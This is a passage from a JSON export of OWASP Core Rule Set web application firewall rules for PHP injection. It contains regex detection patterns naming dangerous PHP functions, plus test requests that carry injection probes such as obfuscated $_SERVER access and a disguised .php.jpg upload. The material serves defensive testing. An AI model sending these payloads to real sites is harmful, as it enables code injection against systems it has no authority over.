acked_array|unc)|is_string_marked_as_valid_utf8|(?:override_libxml_global_sta|parameter_with_attribu)te|zend_(?:call_stack_(?:get|use_all)|ini_(?:parse_u?quantity|str))))|hread_id)|version|weakmap_(?:attach|dump|remove))|ip_(?:close|entry_(?:c(?:lose|ompress(?:edsize|ionmethod))|(?:filesiz|nam)e|open|read)|open|read)|lib_(?:(?:de|en)cod|get_coding_typ)e)|ZendTestNS2_(?:ZendSubNS_)?namespaced_(?:deprecated_)?func)[\\s\\x0b]*\\(", "actions": [ { "act_name": "id", "lineno": 645, "act_quote": "no_quote", "act_arg": "933153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 646, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 647, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 648, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 649, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 650, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Medium-Risk PHP Function Name Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 651, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.933153_MATCHED_VAR_NAME}: %{TX.933153_MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 652, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 653, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 654, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 655, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 656, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 657, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 658, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 659, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 660, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 661, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 662, "act_quote": "quotes", "act_arg": "tx.933153_matched_var=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 663, "act_quote": "quotes", "act_arg": "tx.933153_matched_var_name=%{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 664, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 665, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 644 } }, { "rule_id": "933015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 668, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 668, "act_quote": "no_quote", "act_arg": "933015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 668, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 668, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 668, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 668, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 668, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 668, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 668 } }, { "rule_id": "933016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 669, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 669, "act_quote": "no_quote", "act_arg": "933016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 669, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 669, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 669, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 669, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 669, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 669, "act_quote": "no_quote", "act_arg": "END-REQUEST-933-APPLICATION-ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 669 } }, { "rule_id": "933131", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI", "negated": false } }, "transformations": [ "none", "normalisePath", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: Variables Found", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "SERVER request URLEncoded", "test_id": 1, "request": { "method": "GET", "uri": "/get?x=$_%53ERVER['test'];", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=$_%53ERVER['test'];" } ] }, { "description": "SERVER request URLEncoded", "test_id": 2, "request": { "method": "GET", "uri": "/get?%24_COOKIE=value;", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 933131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "%24_COOKIE=value;" } ] }, { "description": "SERVER index listed with obfuscated SERVER", "test_id": 3, "request": { "method": "GET", "uri": "/get?x=$_%53%20ERVER['REQUEST_URI'];", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 933131 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "x=$_%53%20ERVER['REQUEST_URI'];" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 696, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI", "actions": [ { "act_name": "id", "lineno": 697, "act_quote": "no_quote", "act_arg": "933131", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 698, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 699, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 700, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 701, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 701, "act_quote": "no_quote", "act_arg": "normalisePath", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 701, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 702, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Variables Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 703, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 704, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 705, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 706, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 707, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 708, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 709, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 710, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 711, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 712, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 713, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 714, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 715, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 696 } }, { "rule_id": "933161", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:a(?:bs|s(?:in|sert(?:_options)?))|basename|c(?:h(?:eckdate|r(?:oot)?)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|r(?:eate_function|ypt)|urrent)|d(?:ate|e(?:coct|fined?)|ir)|e(?:nd|val|x(?:ec|p(?:lode)?|tract))|f(?:ile(?:(?:[acm]tim|inod|siz|typ)e|group|owner|perms)?|l(?:o(?:ck|or)|ush))|glob|h(?:ash|eader)|i(?:date|m(?:age(?:gif|(?:jpe|pn)g|wbmp|xbm)|plode)|s_a)|key|l(?:ink|og)|m(?:a(?:il|x)|d5|in)|n(?:ame|ext)|o(?:pendir|rd)|p(?:a(?:ck|ss(?:thru)?)|i|o(?:pen|w)|rev)|r(?:an(?:d|ge)|e(?:(?:adfil|nam)e|set)|ound)|s(?:(?:erializ|huffl)e|in|leep|(?:or|ta)t|ubstr|y(?:mlink|s(?:log|tem)))|t(?:an|(?:im|mpfil)e|ouch|rim)|u(?:cfirst|n(?:lin|pac)k)|virtual)(?:[\\s\\x0b]|/\\*.*\\*/|(?:#|//).*)*\\(.*\\)", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: Low-Value PHP Function Call Found", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "regexp; must run test in PL3!", "test_id": 1, "request": { "method": "POST", "uri": "/post?%20checkDate%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "gethostbynamE(" }, "expected": { "should_block": true, "rule_ids": [ 933161 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "%20checkDate%28%29" }, { "location": "post_body", "value": "gethostbynamE(" } ] }, { "description": "regexp; must run test in PL3!", "test_id": 2, "request": { "method": "POST", "uri": "/post?foo=chroot%09%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "gethostbynamE(" }, "expected": { "should_block": true, "rule_ids": [ 933161 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=chroot%09%28%29" }, { "location": "post_body", "value": "gethostbynamE(" } ] }, { "description": "symlink \\t()", "test_id": 3, "request": { "method": "POST", "uri": "/post?foo=symlink%09%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "gethostbynamE(" }, "expected": { "should_block": true, "rule_ids": [ 933161 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=symlink%09%28%29" }, { "location": "post_body", "value": "gethostbynamE(" } ] }, { "description": "ucfirst()", "test_id": 5, "request": { "method": "POST", "uri": "/post?foo=xucfirst%28%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "gethostbynamE(" }, "expected": { "should_block": false, "rule_ids": [ 933161 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=xucfirst%28%29" }, { "location": "post_body", "value": "gethostbynamE(" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 741, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:a(?:bs|s(?:in|sert(?:_options)?))|basename|c(?:h(?:eckdate|r(?:oot)?)|o(?:(?:mpac|(?:nsta|u)n)t|py|sh?)|r(?:eate_function|ypt)|urrent)|d(?:ate|e(?:coct|fined?)|ir)|e(?:nd|val|x(?:ec|p(?:lode)?|tract))|f(?:ile(?:(?:[acm]tim|inod|siz|typ)e|group|owner|perms)?|l(?:o(?:ck|or)|ush))|glob|h(?:ash|eader)|i(?:date|m(?:age(?:gif|(?:jpe|pn)g|wbmp|xbm)|plode)|s_a)|key|l(?:ink|og)|m(?:a(?:il|x)|d5|in)|n(?:ame|ext)|o(?:pendir|rd)|p(?:a(?:ck|ss(?:thru)?)|i|o(?:pen|w)|rev)|r(?:an(?:d|ge)|e(?:(?:adfil|nam)e|set)|ound)|s(?:(?:erializ|huffl)e|in|leep|(?:or|ta)t|ubstr|y(?:mlink|s(?:log|tem)))|t(?:an|(?:im|mpfil)e|ouch|rim)|u(?:cfirst|n(?:lin|pac)k)|virtual)(?:[\\s\\x0b]|/\\*.*\\*/|(?:#|//).*)*\\(.*\\)", "actions": [ { "act_name": "id", "lineno": 742, "act_quote": "no_quote", "act_arg": "933161", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 743, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 744, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 745, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 746, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 747, "act_quote": "quotes", "act_arg": "PHP Injection Attack: Low-Value PHP Function Call Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 748, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 749, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 750, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 751, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 752, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 753, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 754, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 755, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 756, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 757, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 758, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 759, "act_quote": "quotes", "act_arg": "tx.php_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 760, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 741 } }, { "rule_id": "933111", "has_tests": true, "detection": { "variables": [ { "name": "FILES", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "X-Filename", "negated": false }, { "name": "REQUEST_HEADERS", "part": "X_Filename", "negated": false }, { "name": "REQUEST_HEADERS", "part": "X.Filename", "negated": false }, { "name": "REQUEST_HEADERS", "part": "X-File-Name", "negated": false } ], "operator": { "type": "@rx", "argument": ".*\\.(?:php\\d*|phtml)\\..*$", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "2", "message": "PHP Injection Attack: PHP Script File Upload Found", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-injection-php" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-php", "platform-multi", "attack-injection-php", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/ATTACK-PHP", "capec/1000/152/242" ] }, "test_cases": [ { "description": "PHP Injection Attack: PHP Script File Upload Found", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryoRWIb3busvBrbttO", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "------WebKitFormBoundaryoRWIb3busvBrbttO\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php.jpg\"\nContent-Type: image/jpeg\n\n\n\n------WebKitFormBoundaryoRWIb3busvBrbttO--\n" }, "expected": { "should_block": true, "rule_ids": [ 933111 ] }, "malicious_patterns": [ { "location": "post_body", "value": "------WebKitFormBoundaryoRWIb3busvBrbttO\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php.jpg\"\nContent-Type: image/jpeg\n\n\n\n------WebKitFormBoundaryoRWIb3busvBrbttO--\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 784, "variables": [ { "variable": "FILES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "X-Filename", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "X_Filename", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "X.Filename", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "X-File-Name", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": ".*\\.(?:php\\d*|phtml)\\..*$", "actions": [ { "act_name": "id", "lineno": 785, "act_quote": "no_quote", "act_arg": "933111", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 786, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 787, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 788, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 789, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 789, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 790, "act_quote": "quotes", "act_arg": "PHP Injection Attack: PHP Script File Upload Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 791, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 792, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 793, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 794, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 795, "act_quote": "quotes", "act_arg": "attack-injection-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 796, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 797, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 798, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-PHP", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 799, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 